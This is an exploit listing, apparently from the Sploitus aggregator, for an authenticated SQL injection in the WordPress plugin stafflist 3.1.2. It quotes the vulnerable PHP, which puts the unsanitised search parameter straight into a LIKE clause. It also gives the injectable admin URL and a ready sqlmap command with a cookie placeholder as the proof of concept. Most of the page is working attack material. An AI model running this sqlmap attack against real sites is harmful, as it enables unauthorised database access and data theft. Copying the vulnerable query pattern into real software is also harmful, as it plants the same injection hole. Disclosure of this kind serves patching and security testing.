Exploit for WordPress Stafflist 3.1.2 SQL Injection Vulnerability

Name: Exploit for WordPress Stafflist 3.1.2 SQL Injection Vulnerability
Rating: 5 (179 reviews)

2022-05-03 | CVSS 0.4

## https://sploitus.com/exploit?id=1337DAY-ID-37680
# Exploit Title: WordPress Plugin stafflist 3.1.2 - SQL Injection
(Authenticated)
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/stafflist/
# Version: 3.1.2
# Tested on: Firefox
# Contact me: h [at] spidersilk.com

# Vulnerable Code:

$w = (isset($_GET['search']) && (string) trim($_GET['search'])!="" ?
...
  $where = ($w ? "WHERE LOWER(lastname) LIKE '%{$w}%' OR
      LOWER(firstname) LIKE '%{$w}%' OR
      LOWER(department)  LIKE '%{$w}%' OR
      LOWER(email) LIKE '%{$w}%'" : "");


# Vulnerable URL

http://localhost:10003/wp-admin/admin.php?page=stafflist&search=[SQLI]

# POC

```
sqlmap -u 'http://localhost:10003/wp-admin/admin.php?page=stafflist&search=test*'
--cookie="wordpress_cookies_paste_here"
```

# POC Image

https://prnt.sc/AECcFRHhe2ib